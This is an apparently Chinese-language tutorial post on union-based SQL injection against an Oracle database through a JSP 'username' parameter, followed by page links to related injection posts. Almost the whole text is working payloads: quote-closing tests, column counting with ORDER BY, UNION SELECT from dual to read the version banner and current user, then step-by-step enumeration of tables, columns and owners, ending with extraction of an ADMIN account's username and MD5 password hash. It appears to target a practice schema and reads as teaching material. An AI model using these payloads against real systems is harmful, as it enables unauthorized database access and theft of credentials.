大哥带的Orchel数据库的注入
0X01 先进行判断
a.jsp?username=SMITH and =
发现单引号闭合 我们尝试构造闭合 存在注入
a.jsp?username=SMITH' and ''='1 正确
a.jsp?username=SMITH' and ''='2 错误
0X02构造语句判断
a.jsp?username=SMITH' order by 8-- 正确
a.jsp?username=SMITH' order by 9-- 错误
用null 判断那个字段是字符型 第2 3 个字段为字符型
a.jsp?username=SMITH' union select null,'null',null,null,null,null,null,null from dual-- 正确
a.jsp?username=SMITH' union select null,null,'null',null,null,null,null,null from dual-- 正确
a.jsp?username=SMITH' union select 'null',null,null,null,null,null,null,null from dual-- 错误
0x03获取一些信息
数据库
a.jsp?username=SMITH' union select null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null,null from dual--
?username=SMITH' union select null,(select banner from sys.v_$version where rownum=1),(select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual),null,null,null,null,null from dual--
当前用户名为SCOOTT
(select member from v$logfile where rownum=) 操作系统平台
(select instance_name from v$instance) 服务器sid
0X04爆第一个表 ADMIN
?username=SMITH' union select null,(select table_name from user_tables where rownum=1),null,null,null,null,null,null from dual--
爆第二个表 BONUS
a.jsp?username=SMITH' union select null,(select table_name from user_tables where rownum=1 and table_name not in('ADMIN')),null,null,null,null,null,null from dual--
第三个表 后面的依次类推
a.jsp?username=SMITH' union select null,(select table_name from user_tables where rownum=1 and table_name not in('ADMIN','BONUS')),null,null,null,null,null,null from dual--
0X05爆列名
第一个 ID
a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where rownum=1and table_name=('ADMIN')),null,null,null,null,null,null from dual--
第二个 USERNAME
a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where rownum=1and table_name=('ADMIN') and column_name not in('ID')),null,null,null,null,null,null from dual--
第三个 PASSWORD
a.jsp?username=SMITH' union select null,(select column_name from user_tab_columns where rownum=1and table_name=('ADMIN') and column_name not in('ID','USERNAME')),null,null,null,null,null,null from dual--
0x06爆字段名 USERNAME=admin
/a.jsp?username=SMITH' union select null,(select USERNAME from ADMIN where rownum=1),null,null,null,null,null,null from dual--
a.jsp?username=SMITH' union select null,(select PASSWORD from ADMIN where rownum=1),null,null,null,null,null,null from dual--
PASSWORD=e10adc3949ba59abbe56e057f20f883e 123456
其他
列出数据库数据库名 SYS 其他数据库按照上面的推法 第二个数据库SYSTEM 爆了所有的
a.jsp?username=SMITH' union select null,(SELECT DISTINCT owner FROM all_tables where rownum=1),null,null,null,null,null,null from dual--
a.jsp?username=SMITH' union select null,(SELECT DISTINCT owner FROM all_tables where rownum=1 and owner not in('SYS')),null,null,null,null,null,null from dual--
a.jsp?username=SMITH' union select null,(SELECT DISTINCT owner FROM all_tables where rownum=1 and owner not in('SYS','SYSTEM','EXFSYS','CTXSYS','XDB','MDSYS','APEX_030200','SCOTT','OLAPSYS')),null,null,null,null,null,null from dual--
列出表名 一样 DUAL
/a.jsp?username=SMITH' union select null,(SELECT table_name FROM all_tables where rownum=1),null,null,null,null,null,null from dual--
列出列名
.jsp?username=SMITH' union select null,(SELECT column_name FROM all_tab_columns WHERE table_name='DUAL' and rownum=1),null,null,null,null,null,null from dual--
by 谢谢卿哥带我们学习
大哥带的Orchel数据库的注入的更多相关文章
- 大哥带的Orchel数据库的盲注入bool型
0X01判断闭合 ?username=SMITH' 错误 ?username=SMITH'' 正确 ?username=SMITH' and ascii(substr((select user fro ...
- 大哥带的Orchel数据库的报错注入
0X01 使用报错注入需要使用类似 1=[报错语句],1>[报错语句],使用比较运算符,这样的方式进行报错注入(MYSQL仅使用函数报错即可),类似mssql报错注入的方式. news.jsp? ...
- 大哥带的Orchel数据库时间盲注
0X01Oracle基于延时的盲注总结 0x00 前言 oracle注入中可以通过页面响应的状态,这里指的是响应时间,通过这种方式判断SQL是否被执行的方式,便是时间盲注: oracle的时间盲注通常 ...
- 大哥带我走渗透4(中)----oracle报错注入
5/30 报错注入 0x01 准备阶段 1. 基础知识今天了解了,但是,只能看懂和最基本的理解,不能自己上路.所以,还是要不停学习基础.并且及时总结.这有一篇很详细的文章:https://www.cn ...
- Access数据库SQL注入(Access SQL Injection)
一.Microsoft Office Access数据库手工注入语句 1.参数后面加 ’ .and 1=1.and 1=2看返回状态判断是否存在注入点 2.参数后面加 and exists(sel ...
- CentOS6.5下卸载自带的MySQL数据库安装MySQL5.6
1)查看CentOS自带的mysql 输入 rpm -qa | grep mysql mysql-libs-5.1.71-1.el6.x86_64 2)将其自带的mysql版本全部卸载(非常重要,如不 ...
- 带你了解数据库中事务的ACID特性
前言 前面我们介绍过数据库中 带你了解数据库中JOIN的用法 与 带你了解数据库中group by的用法的相关用法.本章节主要来介绍下数据库中一个非常重要的知识点事务,也是我们项目中或面试中经常会遇到 ...
- 带你了解数据库中group by的用法
前言 本章主要介绍数据库中group by的用法,也是我们在使用数据库时非常基础的一个知识点.并且也会涉及Join的使用,关于Join的用法,可以看我写的上一篇文章:带你了解数据库中JOIN的用法如有 ...
- 第二百八十一节,MySQL数据库-SQL注入和pymysql模块防止SQL注入
MySQL数据库-SQL注入和pymysql模块防止SQL注入 SQL注入就是通过SQL语句绕开程序判断,获取到数据库的内容 下面以一个简单的程序登录SQL注入举例: 正常登录 1.数据库有一张会员表 ...
随机推荐
- python-day15(正式学习)
目录 递归 函数自我嵌套 调用 直接调用 间接调用 为什么要用递归呢 如何使用递归 内置函数 掌握 了解 面向对象方法 面向过程编程 注册 分层实现功能 递归 递归的本质就是函数调用自身,当然也会有一 ...
- python 写简单的职员信息管理系统
职员信息管理系统要求依次从键盘录入每位员工的信息,包括姓名.员工id.身份证号要求:1.身份证号十八位,要求除了第18位可以为x,其余都只能为数字2.id须由5位数字组成3.否则提示用户重新输入不符合 ...
- javascript高级程序设计读书笔记-事件(一)
读书笔记,写的很乱 事件处理程序 事件处理程序分为三种: 1.html事件2. DOM0级,3,DOM2级别 没有DOM1 同样的事件 DOM0会顶掉html事件 因为他们都是属性 而 ...
- VeryNginx详细配置说明
自定义行为 ( Custom Action ) 匹配器 (Matcher) 匹配器 VeryNginx 会收到各种各样的Http请求,当我们定义一条规则(Action)的时候,我们可能会需要限定,这条 ...
- Linux 问题集
解决E: Encountered a section with no Package: header错误 我的ubuntu机器上出现下面这个错误. Reading package lists... E ...
- linux环境查看版本信息
1.uname -a 2.cat /proc/version 3.cat /etc/issue 4.cat /proc/cpuinfo (查看cpu相关信息)
- go依赖包管理工具vendor基础
go依赖包管理工具vendor基础 vendor是go的依赖包管理工具,主要用于管理项目中使用到的一些依赖. 它将项目依赖的包,特指外部包,复制到当前工程下的vendor目录下,这样go build的 ...
- MySQL on duplicate key update 批量插入并更新已存在数据
业务上经常存在一种现象,需要批量往表中插入多条数据,但在执行过程中,很可能因为唯一键冲突,而导致批量插入失败.因此需要事先判断哪些数据是重复的,哪些是新增的.比较常用的处理方法就是找出已存在的数据,并 ...
- vue.js(1)--创建vue实例的基本结构
vue实例基本结构与MVVM框架 (1)vue实例基本结构 <!DOCTYPE html> <html lang="en"> <head> &l ...
- js数组与对象的区别
数组和对象两者都可以用来表示数据的集合,曾一度搞不清楚”数组”(array)和”对象”(object)的根本区别在哪里. 有一个数组a=[1,2,3,4],还有一个对象a={0:1,1:2,2:3,3 ...